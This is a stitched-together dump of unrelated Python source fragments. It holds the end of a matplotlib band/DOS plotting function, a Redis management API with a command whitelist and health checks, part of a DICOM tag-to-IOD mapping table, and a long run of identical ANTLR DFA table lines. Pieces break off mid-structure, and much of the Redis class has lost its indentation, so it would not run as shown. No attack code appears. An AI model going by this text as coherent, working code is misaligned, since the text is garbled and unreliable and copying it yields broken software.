        legend=legend,
        total=True,
        erange=erange,
    )

    # drop the lowest DOS tick so it does not collide with the band panel
    fig.canvas.draw()
    tick_count = len(dos_ax.get_xticklabels())
    dos_ax.xaxis.set_major_locator(MaxNLocator(nbins=tick_count - 1, prune='lower'))
    plt.tight_layout(pad=0.2)
    plt.subplots_adjust(wspace=0)

    if save:
        plt.savefig(output)
    else:
        return fig, band_ax, dos_ax
def band_dos_plain_spin_polarized(
band_folder,
dos_folder,
output='band_dos_plain_sp.png',
up_color='black',
down_color='red',
linewidth=1.25,
up_linestyle='-',
| |
<filename>yasql/apps/redisms/redisApi.py
# -*- coding: utf-8 -*-
# __author__ : pandonglin
import redis, time
REDIS_READ_CMDS = [  # read-only redis commands allowed through this API
    "help",
    "info",
    "exists",
    "keys",
    "type",
    "ttl",
    "scan",
    "get",
    "mget",
    "strlen",
    "hexists",
    "hget",
    "hlen",
    "hmget",
    "hvals",
    "hscan",
    "lindex",
    "llen",
    "lrange",
    "scard",
    "sismember",
    "smembers",
    "srandmember",
    "sscan",
    "zcard",
    "zcount",
    "zrange",
    "zrangebyscore",
    "zrank",
    "zrevrange",
    "zrevrangebyscore",
    "zrevrank",
    "zscore",
    "zscan",
]
REDIS_WRITE_CMDS = [  # redis write commands allowed here; delete-style commands are deliberately excluded
    "set",
    "setex",
    "setnx",
    "hset",
    "hsetnx",
    "lpush",
    "lpushx",
    "rpush",
    "rpushx",
    "sadd",
    "zadd",
]
# full whitelist of commands this API will execute
REDIS_CMDS = REDIS_READ_CMDS + REDIS_WRITE_CMDS
class RedisApi:
    def __init__(self, host, port, db=0, password=None):
        """Store the connection settings and connect immediately.

        Raises if the server does not answer PING (see get_conn).
        """
        self.host = host
        self.port = port
        self.db = db
        self.password = password
        self.conn = self.get_conn()  # fail fast: get_conn pings the server
def get_conn(self):
conn = redis.Redis(self.host, self.port, self.db, password=self.password,
socket_timeout=15, socket_connect_timeout=3, decode_responses=True)
try:
conn.ping()
except Exception as err:
raise Exception("can't connect redis")
return conn
    def check_ping(self):
        """Connectivity probe used by health checks.

        Returns a one-element error list when the server cannot be reached.
        NOTE(review): implicitly returns None (not an empty list) on success,
        and connects without selecting self.db — confirm callers expect both.
        """
        conn = redis.Redis(self.host, self.port, password=self.password,
                           socket_timeout=15, socket_connect_timeout=3, decode_responses=True)
        try:
            conn.ping()
        except Exception as err:
            return [{"status": "fatal", "msg": "can't connect redis"}]
def persistence(self):
"""数据持久检查"""
data = []
result = self.conn.info()
rdb_last_bgsave_status = result.get("rdb_last_bgsave_status", None)
if rdb_last_bgsave_status != "ok":
data.append({"status": "err", "msg": "rdb bgsave error"})
append_only = self.get_config("appendonly")
if not append_only:
data.append({"status": "fatal", "msg": "aof is disabled"})
else:
aof_last_bgrewrite_status = result.get("aof_last_bgrewrite_status", None)
if aof_last_bgrewrite_status != "ok":
data.append({"status": "err", "msg": "aof bgrewrite error"})
return data
    def cluster_status(self):
        """TODO: cluster status checks — not implemented, always returns []."""
        data = []
        return data
def metrics(self):
"""通用指标"""
data = []
result = self.conn.info()
# 内存使用
max_memory = result.get("max_memory", None) or result.get("total_system_memory", None)
used_memory = result.get("used_memory", 0)
used_memory_percent = float(used_memory) / max_memory if max_memory else 0
if used_memory_percent > 0.8:
data.append({"status": "warning", "msg": "current redis memory usage > 80%"})
used_memory_peak = result.get("used_memory_peak", 0)
used_memory_peak_percent = float(used_memory_peak) / max_memory if max_memory else 0
if used_memory_peak_percent > 0.9:
data.append({"status": "err", "msg": "redis memory peak usage > 90%"})
# 连接数
connected_client = result.get("connected_clients", 0)
max_connect = self.get_config("maxclients").get("maxclients")
used_connect_percent = float(connected_client) / int(max_connect) if max_connect.isdigit() else 1
if used_connect_percent > 0.8:
data.append({"status": "warning", "msg": "client connect usage > 80%"})
# qps
qps = result.get("instantaneous_ops_per_sec", 0)
if qps > 60000:
data.append({"status": "fatal", "msg": "qps usage > 60000"})
return data
def bulk_ops(self):
"""set/get"""
k = "<KEY>" # 测试key
data = []
try:
if self.conn.set(k, "1", ex=3):
v = self.conn.get(k)
if v != "1":
data.append({"status": "err", "msg": "redis can't read"})
else:
data.append({"status": "err", "msg": "redis can't write"})
except Exception as err:
data.append({"status": "err", "msg": err})
return data
    def get_monitor(self):
        """Collect MONITOR output from the server.

        Returns:
            list: at most ~500 command entries, collected for at most ~10s.
        """
        data = []
        start_at = time.time()
        try:
            with self.conn.monitor() as m:
                for command in m.listen():
                    data.append(command)
                    used_time = time.time() - start_at
                    if len(data) > 500 or used_time > 10:  # cap: 500 entries or 10 seconds of collection
                        break
        except Exception as err:
            # best-effort: monitoring failures are deliberately ignored and
            # whatever was collected so far is returned
            pass
        return data
def get_metrics(self, db):
"""监控指标"""
result1 = self.conn.info()
time.sleep(1)
result2 = self.conn.info()
slowlog = self.read_slowlog_len()
data = {
"version": result1.get("redis_version"),
"run_time": "%s days" % result1.get("uptime_in_days", 0),
"connected_client": result1.get("connected_clients", 0),
"blocked_client": result1.get("blocked_clients", 0),
"redis_mode": result1.get("redis_mode"),
"total_memory": result1.get("total_system_memory_human", 0),
"used_memory": result1.get("used_memory_human", 0),
"max_memory": result1.get("max_memory", 0),
"used_cpu_sys": float('%.2f' % (result2.get("used_cpu_sys") - result1.get("used_cpu_sys"))),
"used_cpu_user": float('%.2f' % (result2.get("used_cpu_user") - result1.get("used_cpu_user"))),
"key_hits": result1.get("keyspace_hits"),
"key_misses": result1.get("keyspace_misses"),
"qps": result1.get("instantaneous_ops_per_sec"),
"slowlog_num": slowlog,
"keys": result1.get(db),
}
return data
def get_config(self, conf_arg):
"""获取配置信息"""
if conf_arg:
try:
r = self.conn.config_get(conf_arg)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'config' command"
def read_help(self, args_list):
if len(args_list) == 0:
return REDIS_CMDS
else:
return "ERR wrong number of arguments for 'help' command"
def read_info(self, args_list):
if len(args_list) == 0:
return self.conn.info()
else:
return "ERR wrong number of arguments for 'info' command"
    def read_slowlog_len(self):
        """Return the number of entries in the server slow log."""
        return self.conn.slowlog_len()
def read_exists(self, args_list):
"""检查给定 key 是否存在"""
if len(args_list) == 1:
try:
r = self.conn.exists(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'exists' command"
def read_keys(self, args_list):
"""查找所有符合给定模式 pattern 的 key"""
if len(args_list) == 1 and args_list[0] != "*":
try:
r = self.conn.keys(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return " 'keys' command must have pattern,and pattern can't be '*' "
def read_type(self, args_list):
"""返回 key 所储存的值的类型"""
if len(args_list) == 1:
return self.conn.type(args_list[0])
else:
return "ERR wrong number of arguments for 'type' command"
def read_ttl(self, args_list):
"""返回 过期时间"""
if len(args_list) == 1:
return self.conn.ttl(args_list[0])
else:
return "ERR wrong number of arguments for 'ttl' command"
def read_scan(self, args_list):
"""SCAN 命令及其相关的 SSCAN 命令、 HSCAN 命令和 ZSCAN 命令都用于增量地迭代(incrementally iterate)一集元素(a collection of elements"""
try:
if len(args_list) == 1:
r = self.conn.scan(args_list[0])
elif len(args_list) > 1 and len(args_list) % 2 != 0:
args = args_list[1:]
d = {}
for i in range(len(args)):
if args[i].upper() == 'MATCH':
d['match'] = args[i+1]
elif args[i].upper() == 'COUNT':
d['count'] = args[i+1]
r = self.conn.scan(args_list[0], **d)
else:
r = "ERR wrong arguments for 'scan' command"
except Exception as err:
r = str(err)
return r
def read_get(self, args_list):
"""返回 key 所关联的字符串值"""
if len(args_list) == 1:
try:
r = self.conn.get(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'get' command"
def read_mget(self, args_list):
"""返回所有(一个或多个)给定 key 的值"""
if len(args_list) >= 1:
try:
r = self.conn.mget(args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'mget' command"
def read_strlen(self, args_list):
"""返回 key 所储存的字符串值的长度"""
if len(args_list) == 1:
try:
r = self.conn.strlen(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'strlen' command"
def read_hexists(self, args_list):
"""查看哈希表 key 中,给定域 field 是否存在"""
if len(args_list) == 2:
try:
r = self.conn.hexists(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hexists' command"
def read_hget(self, args_list):
"""返回哈希表 key 中给定域 field 的值"""
if len(args_list) == 2:
try:
r = self.conn.hget(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hget' command"
def read_hlen(self, args_list):
"""返回哈希表 key 中域的数量"""
if len(args_list) == 1:
try:
r = self.conn.hlen(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hlen' command"
def read_hmget(self, args_list):
"""返回哈希表 key 中,一个或多个给定域的值"""
if len(args_list) >= 1:
try:
r = self.conn.hmget(args_list[0], args_list[1:])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hmget' command"
def read_hvals(self, args_list):
"""返回哈希表 key 中所有域的值"""
if len(args_list) == 1:
try:
r = self.conn.hvals(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'hvals' command"
def read_hscan(self, args_list):
"""用于增量地迭代"""
try:
if len(args_list) == 2:
r = self.conn.hscan(args_list[0], args_list[1])
elif len(args_list) > 2 and len(args_list) % 2 == 0:
args = args_list[2:]
d = {}
for i in range(len(args)):
if args[i].upper() == 'MATCH':
d['match'] = args[i+1]
elif args[i].upper() == 'COUNT':
d['count'] = args[i+1]
r = self.conn.hscan(args_list[0], args_list[1], **d)
else:
r = "ERR wrong arguments for 'hscan' command"
except Exception as err:
r = str(err)
return r
def read_lindex(self, args_list):
"""返回列表 key 中,下标为 index 的元素"""
if len(args_list) == 2:
try:
r = self.conn.lindex(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'lindex' command"
def read_llen(self, args_list):
"""返回列表 key 的长度"""
if len(args_list) == 1:
try:
r = self.conn.llen(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'llen' command"
def read_lrange(self, args_list):
"""返回列表 key 中指定区间内的元素,区间以偏移量 start 和 stop 指定"""
if len(args_list) == 3:
try:
r = self.conn.lrange(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'lrange' command"
def read_scard(self, args_list):
"""返回集合 key 的基数(集合中元素的数量)"""
if len(args_list) == 1:
try:
r = self.conn.scard(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'scard' command"
def read_sismember(self, args_list):
"""判断 member 元素是否集合 key 的成员"""
if len(args_list) == 2:
try:
r = self.conn.sismember(*args_list)
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of arguments for 'sismember' command"
def read_smembers(self, args_list):
"""返回集合 key 中的所有成员"""
if len(args_list) == 1:
try:
r = self.conn.smembers(args_list[0])
except Exception as err:
r = str(err)
return r
else:
return "ERR wrong number of | |
IMAGE IOD': ['Image'],
'XRF IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'RT IMAGE IOD': ['Image'],
'CR IMAGE IOD': ['Image'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
},
# ReferencedDateTime
0x0040A13AL: {
'SPECTACLE PRESCIPTION REPORT IOD': ['Document'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Document'],
'MAMMOGRAPHY CAD SR IOD': ['Document'],
'BASIC TEXT SR IOD': ['Document'],
'X-RAY RADIATION DOSE SR IOD': ['Document'],
'PROCEDURE LOG IOD': ['Document'],
'ENHANCED SR IOD': ['Document'],
'CHEST CAD SR IOD': ['Document'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Document'],
None: ['Document'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Document'],
'COMPREHENSIVE SR IOD': ['Document'],
'COLON CAD SR IOD': ['Document'],
},
# PhototimerSetting
0x00187065L: {
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
None: ['Image'],
},
# ScatterCorrected
0x00189760L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# ImplantAssemblyTemplateIssuer
0x00760003L: {
'IMPLANT ASSEMBLY TEMPLATE IOD': ['Implant Assembly'],
None: ['Implant Assembly'],
},
# GantryMotionCorrected
0x00189762L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# PatientMotionCorrected
0x00189763L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# ClinicalTrialProtocolID
0x00120020L: {
'BASIC STRUCTURED DISPLAY IOD': ['Patient'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Patient'],
'RT BRACHY TREATMENT RECORD IOD': ['Patient'],
'RT STRUCTURE SET IOD': ['Patient'],
'RT PLAN IOD': ['Patient'],
'CR IMAGE IOD': ['Patient'],
'RAW DATA IOD': ['Patient'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Patient'],
'ENHANCED MR IMAGE IOD': ['Patient'],
'BASIC CARDIAC EP IOD': ['Patient'],
'RT TREATMENT SUMMARY RECORD IOD': ['Patient'],
'12-LEAD ECG IOD': ['Patient'],
'RESPIRATORY WAVEFORM IOD': ['Patient'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Patient'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Patient'],
'BASIC VOICE AUDIO IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Patient'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Patient'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Patient'],
'BASIC TEXT SR IOD': ['Patient'],
'NM IMAGE IOD': ['Patient'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'LENSOMETRY MEASUREMENTS IOD': ['Patient'],
'MR SPECTROSCOPY IOD': ['Patient'],
'ENCAPSULATED PDF IOD': ['Patient'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CHEST CAD SR IOD': ['Patient'],
'HEMODYNAMIC IOD': ['Patient'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Patient'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Patient'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Patient'],
'ENHANCED MR COLOR IMAGE IOD': ['Patient'],
'ENHANCED CT IMAGE IOD': ['Patient'],
'X-RAY RADIATION DOSE SR IOD': ['Patient'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Patient'],
'PROCEDURE LOG IOD': ['Patient'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Patient'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Patient'],
'STEREOMETRIC RELATIONSHIP IOD': ['Patient'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Patient'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Patient'],
'VL ENDOSCOPIC IMAGE IOD': ['Patient'],
'KERATOMETRY MEASUREMENTS IOD': ['Patient'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Patient'],
'COMPREHENSIVE SR IOD': ['Patient'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Patient'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Patient'],
'SPATIAL FIDUCIALS IOD': ['Patient'],
'RT ION PLAN IOD': ['Patient'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CT IMAGE IOD': ['Patient'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Patient'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Patient'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Patient'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'RT DOSE IOD': ['Patient'],
'AMBULATORY ECG IOD': ['Patient'],
'SURFACE SEGMENTATION IOD': ['Patient'],
'MAMMOGRAPHY CAD SR IOD': ['Patient'],
'VL MICROSCOPIC IMAGE IOD': ['Patient'],
'RT BEAMS TREATMENT RECORD IOD': ['Patient'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Patient'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'RT IMAGE IOD': ['Patient'],
'SC IMAGE IOD': ['Patient'],
None: ['Patient'],
'SEGMENTATION IOD': ['Patient'],
'PET IMAGE IOD': ['Patient'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'DIGITAL X-RAY IMAGE IOD': ['Patient'],
'REAL WORLD VALUE MAPPING IOD': ['Patient'],
'SPATIAL REGISTRATION IOD': ['Patient'],
'COLON CAD SR IOD': ['Patient'],
'INTRAVASCULAR OCT IMAGE IOD': ['Patient'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'ENHANCED PET IMAGE IOD': ['Patient'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Patient'],
'US MULTI-FRAME IMAGE IOD': ['Patient'],
'ENHANCED X-RAY RF IMAGE IOD': ['Patient'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Patient'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Patient'],
'US IMAGE IOD': ['Patient'],
'GENERAL ECG IOD': ['Patient'],
'XRF IMAGE IOD': ['Patient'],
'ENCAPSULATED CDA IOD': ['Patient'],
'ENHANCED SR IOD': ['Patient'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'GENERAL AUDIO WAVEFORM IOD': ['Patient'],
'MR IMAGE IOD': ['Patient'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Patient'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Patient'],
'ARTERIAL PULSE WAVEFORM IOD': ['Patient'],
},
# ReferencedTreatmentRecordSequence
0x30080030L: {
'RT BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'RT BRACHY TREATMENT RECORD IOD': ['Treatment Record'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'RT TREATMENT SUMMARY RECORD IOD': ['Treatment Record'],
None: ['Treatment Record'],
},
# NonUniformRadialSamplingCorrected
0x00189766L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# CatheterDirectionOfRotation
0x00520031L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
None: ['Image'],
},
# DetectorNormalizationCorrection
0x00189768L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# KSpaceFiltering
0x00189064L: {
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'MR SPECTROSCOPY IOD': ['Equipment'],
'ENHANCED MR IMAGE IOD': ['Image'],
None: ['Image', 'Equipment'],
},
# AttenuationCorrectionTemporalRelationship
0x00189770L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# NumberOfTemporalPositions
0x00200105L: {
'MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# PerformedProtocolType
0x00400261L: {
'ENHANCED ULTRASOUND VOLUME IOD': ['Series'],
None: ['Series'],
},
# RangingDepth
0x00520009L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
None: ['Image'],
},
# ExposureTimeInuS
0x00188150L: {
None: ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'XRF IMAGE IOD': ['Image'],
},
# NumberOfCopies
0x20000010L: {
'MEDIA CREATION MANAGEMENT IOD': ['Media Creation Management'],
'FILM SESSION IOD': ['Film Session'],
None: ['Film Session', 'Media Creation Management'],
},
# CorrectedLocalizedDeviationFromNormalCalculated
0x00240078L: {
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
None: ['Measurements'],
},
# AdmissionID
0x00380010L: {
'BASIC STRUCTURED DISPLAY IOD': ['Study'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Study'],
'RT BRACHY TREATMENT RECORD IOD': ['Study'],
'RT STRUCTURE SET IOD': ['Study'],
'RT PLAN IOD': ['Study'],
'CR IMAGE IOD': ['Study'],
'RAW DATA IOD': ['Study'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Study'],
'ENHANCED MR IMAGE IOD': ['Study'],
'UNIFIED PROCEDURE STEP IOD': ['Unified Procedure Step'],
'BASIC CARDIAC EP IOD': ['Study'],
'RT TREATMENT SUMMARY RECORD IOD': ['Study'],
'12-LEAD ECG IOD': ['Study'],
'RESPIRATORY WAVEFORM IOD': ['Study'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Study'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Study'],
'BASIC VOICE AUDIO IOD': ['Study'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Study'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Study'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Study'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Study'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Study'],
'BASIC TEXT SR IOD': ['Study'],
'NM IMAGE IOD': ['Study'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'LENSOMETRY MEASUREMENTS IOD': ['Study'],
'MR SPECTROSCOPY IOD': ['Study'],
'ENCAPSULATED PDF IOD': ['Study'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Study'],
'CHEST CAD SR IOD': ['Study'],
'HEMODYNAMIC IOD': ['Study'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Study'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Study'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Study'],
'ENHANCED MR COLOR IMAGE IOD': ['Study'],
'ENHANCED CT IMAGE IOD': ['Study'],
'X-RAY RADIATION DOSE SR IOD': ['Study'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Study'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Study'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Study'],
'STEREOMETRIC RELATIONSHIP IOD': ['Study'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Study'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Study'],
'VL ENDOSCOPIC IMAGE IOD': ['Study'],
'KERATOMETRY MEASUREMENTS IOD': ['Study'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Study'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Study'],
'COMPREHENSIVE SR IOD': ['Study'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Study'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Study'],
'SPATIAL FIDUCIALS IOD': ['Study'],
'RT ION PLAN IOD': ['Study'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Study'],
'CT IMAGE IOD': ['Study'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Study'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Study'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Study'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'RT DOSE IOD': ['Study'],
'GENERAL PURPOSE PERFORMED PROCEDURE STEP IOD': ['General Purpose Performed Procedure Step'],
'AMBULATORY ECG IOD': ['Study'],
'SURFACE SEGMENTATION IOD': ['Study'],
'MAMMOGRAPHY CAD SR IOD': ['Study'],
'VL MICROSCOPIC IMAGE IOD': ['Study'],
'RT BEAMS TREATMENT RECORD IOD': ['Study'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Study'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Study'],
'RT IMAGE IOD': ['Study'],
'SC IMAGE IOD': ['Study'],
None: ['Study', 'Unified Procedure Step', 'General Purpose Performed Procedure Step'],
'SEGMENTATION IOD': ['Study'],
'PET IMAGE IOD': ['Study'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'DIGITAL X-RAY IMAGE IOD': ['Study'],
'REAL WORLD VALUE MAPPING IOD': ['Study'],
'SPATIAL REGISTRATION IOD': ['Study'],
'COLON CAD SR IOD': ['Study'],
'INTRAVASCULAR OCT IMAGE IOD': ['Study'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'ENHANCED PET IMAGE IOD': ['Study'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Study'],
'US MULTI-FRAME IMAGE IOD': ['Study'],
'ENHANCED X-RAY RF IMAGE IOD': ['Study'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Study'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Study'],
| |
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
